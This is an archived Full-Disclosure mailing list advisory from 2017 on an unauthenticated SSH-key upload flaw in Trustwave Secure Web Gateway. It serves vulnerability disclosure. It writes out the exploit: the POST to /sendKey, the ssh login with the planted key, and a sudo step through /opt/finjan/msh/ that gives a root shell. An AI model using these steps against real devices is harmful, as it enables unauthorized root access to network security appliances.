lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 26 Dec 2017 10:55:25 +0200
From: Maor Shwartz <>
Cc: SecuriTeam Secure Disclosure <>
Subject: [FD] SSD Advisory – Trustwave SWG Unauthorized Access

SSD Advisory – Trustwave SWG Unauthorized Access

Vulnerability Summary
The following advisory describes an unauthorized access vulnerability that
allows an unauthenticated user to add their own SSH key to a remote
Trustwave SWG version

Trustwave Secure Web Gateway (SWG) “provides distributed enterprises
effective real-time protection against dynamic new malware, strong policy
enforcement, and a unique Zero-Malware Guarantee when managed for you by
our experts.”

An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response
Trustwave was informed of the vulnerability, and released the following

Vulnerability details
Trustwave SWG allows remote attackers to send to the SWG product a SSH key
that will be used by the SWG product as the SSH key to logon to the device.

This allows unauthenticated user to send a POST request to /sendKey


POST /sendKey HTTP/1.1
Host: trustwave.device:5222
Content-Length: 558
content-type: multipart/form-data
user-agent: libwww-perl/6.15
Connection: close

Content-Disposition: form-data; name="publicKey";
Content-Type: text/plain


Which will add the supplied ssh key to Trustwave SWG, which we can use it
to login to the device:

 /usr/bin/ssh -q -o PasswordAuthentication=no -o StrictHostKeyChecking=no
-o ConnectTimeout=3 -o ServerAliveInterval=10 -i ./test.key
Last login: Fri Aug 25 9:01:23 2017 from x.x.x.x
SWG Version               :
SWG Maintenance Release   : 0
Role                      : vs
Machine Type              : NG-6000

If we will run the id command via ssh we will get the following response:

-sh-4.1$ id
uid=1000(rsyncuser) gid=48(apache) groups=48(apache)

Once we connected to Trustwave SWG via SSH we can run commands as root by
accessing /opt/finjan/msh/

# sudo /opt/finjan/msh/ bash
bash-4.1# id
uid=0(root) gid=0(root) groups=0(root)

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists